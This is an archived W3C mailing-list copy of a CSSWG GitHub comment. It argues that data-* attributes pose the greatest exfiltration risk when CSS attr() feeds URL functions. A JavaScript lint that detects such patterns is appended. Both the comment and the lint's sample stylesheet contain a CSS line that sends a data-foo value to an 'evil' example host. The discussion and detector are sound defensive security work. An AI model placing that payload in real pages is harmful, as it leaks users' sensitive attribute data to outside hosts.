- From: Tab Atkins Jr. via GitHub <sysbot+gh@w3.org>
- Date: Mon, 15 Apr 2024 18:19:42 +0000
- To: public-css-archive@w3.org
> Requiring using data- attributes for custom elements would feel weird.

Note that `data-*` attributes are *not* safer to use, as this comment (and several others) seems to be implicitly assuming. They are, in fact, *the most dangerous* attributes to use, because they're the most likely to contain application-specific data that might be sensitive. The quickest path to an exploit with this feature is `background-image: src(string("http://example.com/evil?token=" attr(data-foo)));`; nearly any other usage or attribute is going to be dramatically safer. ^_^

There's only a handful of built-in attributes that have the potential to carry sensitive data: `nonce`, `value` attributes if you're using them to load up sensitive data at page load, and probably `src`/`href` values, particularly for `script`s.

(So, no, limiting data URIs to being constructed only with data-* attributes is not a useful harm reduction. ^_^)

--
GitHub Notification of comment by tabatkins
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/9141#issuecomment-2057536843 using your GitHub account

--
Sent via github-notify-ml as configured in https://github.com/w3c/github-notify-ml-config
Received on Monday, 15 April 2024 18:19:43 UTC
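The point of the comment above is that the risk of `attr()` feeding a URL-valued function depends on which attribute is read, with `data-*` at the top of the list. As an added example (not code from the thread, the CSSWG, or any browser), here is a small stylesheet lint a reviewer could run over CSS text: it finds `attr()` references that sit inside `src()`, `url()` or `image-set()` and ranks the referenced attribute using the tiers the comment names. The function names (`findAttrExfilSinks`, `attributeRisk`, `lintSample`), the high/medium/low mapping, and the sample stylesheet are all constructed here for illustration.

```javascript
// Added example, not part of the mailing-list thread. A minimal lint for flat
// (non-nested) CSS that flags attr() used inside a URL-producing function.
// Assumptions: rule bodies contain no nested blocks, and declaration values
// contain no ';' (a data: URI with ';' would be split; see the comment below).

// Built-in attributes the comment singles out as potentially sensitive.
const SENSITIVE_BUILTINS = new Set(["nonce", "value", "src", "href"]);

// Risk tiers follow the comment: data-* first, then the named built-ins.
function attributeRisk(attrName) {
  const name = attrName.toLowerCase();
  if (name.startsWith("data-")) return "high";       // application data, most likely sensitive
  if (SENSITIVE_BUILTINS.has(name)) return "medium"; // nonce / value / src / href
  return "low";
}

// Returns [{ property, attribute, risk }] for every attr() that appears in a
// declaration whose value also contains src(), url() or image-set().
function findAttrExfilSinks(cssText) {
  const findings = [];
  const blockRe = /\{([^{}]*)\}/g;            // one flat rule body per match
  const sinkRe = /\b(src|url|image-set)\s*\(/i;
  let block;
  while ((block = blockRe.exec(cssText)) !== null) {
    // Splitting on ';' is the known limitation: a ';' inside a quoted string
    // (e.g. a data: URI) would be cut here. Good enough for a first pass.
    for (const decl of block[1].split(";")) {
      const colon = decl.indexOf(":");
      if (colon < 0) continue;
      const property = decl.slice(0, colon).trim();
      const value = decl.slice(colon + 1);
      if (!sinkRe.test(value)) continue;      // no URL-producing sink in this value
      const attrRe = /\battr\(\s*([a-zA-Z_:][-a-zA-Z0-9_:.]*)/g;
      let a;
      while ((a = attrRe.exec(value)) !== null) {
        findings.push({ property, attribute: a[1], risk: attributeRisk(a[1]) });
      }
    }
  }
  return findings;
}

// Constructed sample stylesheet: one rule reproduces the pattern from the
// comment, one reads an attribute without any URL sink, one reads href into src().
const SAMPLE_CSS = `
.badge { background-image: src(string("http://example.com/evil?token=" attr(data-foo))); }
.label::after { content: attr(title); }
.link { list-style-image: src(attr(href)); }
`;

function lintSample() {
  return findAttrExfilSinks(SAMPLE_CSS);
}

// Run directly: prints the two findings (data-foo: high, href: medium).
if (typeof require !== "undefined" && require.main === module) {
  for (const f of lintSample()) {
    console.log(`${f.risk.toUpperCase()}: ${f.property} reads attr(${f.attribute})`);
  }
}
```

The lint is deliberately conservative in what it treats as a sink (only the three URL-producing functions) and deliberately broad in what it treats as risky (every `data-*` name), which matches the comment's argument that the attribute, not the URL scheme, is what determines exposure. A `content: attr(title)` declaration is reported nowhere because nothing turns it into a request.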